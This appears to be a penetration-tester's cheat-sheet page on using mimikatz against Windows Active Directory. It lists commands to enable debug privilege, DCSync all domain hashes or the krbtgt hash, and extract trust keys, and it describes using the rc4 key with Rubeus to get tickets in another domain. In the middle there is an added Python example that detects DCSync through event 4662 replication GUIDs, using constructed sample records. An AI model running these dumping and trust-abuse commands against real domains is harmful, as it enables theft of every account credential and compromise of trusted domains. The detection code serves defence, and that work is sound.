# mimikatz.exe
A little [tool](https://github.com/gentilkiwi/mimikatz) to play with Windows security.

## Get ready to work with mimikatz
Before running mimikatz, you'll want to launch a command prompt with admin rights, then:
```
mimikatz.exe
privilege::debug
```

## Extract all hashes from a domain controller (when you have DA rights)

```
lsadump::dcsync /domain:domain.com /all /csv
```

## Extract hashes of a single user
```
lsadump::dcsync /domain:domain.com /user:krbtgt
```
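From the defending side, every `lsadump::dcsync` pull is a directory replication request, and a domain controller auditing "Directory Service Access" logs it as Security event 4662 carrying the replication control-access GUIDs. The added example below (not part of the original cheat sheet, and not mimikatz code) flags 4662 records where an account outside the expected set of replicators exercised one of those rights; the flattened record format, the event lines and the replicator allowlist are constructed for the example.

```python
import re

# Control-access rights that a DCSync request exercises on the domain object.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts that legitimately replicate: DC machine accounts plus an assumed
# directory-sync service account. Constructed allowlist for this example.
EXPECTED_REPLICATORS = {"DC01$", "DC02$", "svc_dirsync"}

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.I)


def parse_4662(line):
    """Parse a flattened record 'EventID=4662;SubjectUserName=...;Properties=...'
    into a dict. The format is constructed for this example, not an EVTX export."""
    return dict(kv.split("=", 1) for kv in line.strip().split(";") if "=" in kv)


def dcsync_alerts(lines):
    """Return (account, right_name) for each 4662 record in which an account
    outside EXPECTED_REPLICATORS used a replication control-access right."""
    alerts = []
    for line in lines:
        ev = parse_4662(line)
        if ev.get("EventID") != "4662":
            continue
        user = ev.get("SubjectUserName", "")
        if user in EXPECTED_REPLICATORS:
            continue  # DCs replicating among themselves are expected
        for guid in GUID_RE.findall(ev.get("Properties", "")):
            name = REPLICATION_GUIDS.get(guid.lower())
            if name:
                alerts.append((user, name))
    return alerts


SAMPLE_EVENTS = [  # constructed sample records
    "EventID=4662;SubjectUserName=DC02$;ObjectType=domainDNS;Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=jdoe;ObjectType=domainDNS;Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=jdoe;ObjectType=user;Properties={00000000-0000-4000-8000-00000000c0de}",
    "EventID=4624;SubjectUserName=jdoe",
]

if __name__ == "__main__":
    for account, right in dcsync_alerts(SAMPLE_EVENTS):
        print(f"possible DCSync: {account} used {right}")
```

Only the second record fires, once per replication right; a DC account replicating, a non-replication GUID, and a non-4662 event are all ignored.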

## Extract domain trust keys
For example, if you have pwn3d domain2.com and want to extract trust keys for domain1.com, [first look up the victim domain's GUID](/cmd/Windows/get-adobject), and then you can do this from your mimikatz prompt where you have full rights:

```
lsadump::dcsync /guid:{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} /domain:domain2.com
```

The output will look something like:

```
<snip>
[OUT] DOMAIN1.COM -> DOMAIN2.COM
* 1/1/2024 7:11 a.m. - CLEAR - <snip>
aes256_hmac: BLAHBLAH
aes128_hmac: BLAHBLAH
rc4_hmac_nt: IMPORTANT!
<snip>
```

Take the `rc4_hmac_nt` value and then use [Rubeus](/pentesting/Internal/rubeus) to get a TGT for DOMAIN.COM.

More good stuff about abusing domain trusts is [here](https://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/). I also found [this example](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-trust-accountusd-accessing-resources-on-a-trusted-domain-from-a-trusting-domain) to be *excellent* for walking you through a pwnage situation where you've got DA on DOMAIN2.COM and want to pwn DOMAIN1.COM via a trust relationship.

:::tip
One time mimikatz threw an error (unfortunately I didn't write it down) about not being able to extract the *krbtgt* account, but after reading [this article](https://notes.qazeer.io/active-directory/post_exploitation-ntds_dit_dumping) I learned I had to use the `/domain` flag to specify the domain I was dumping from.
:::
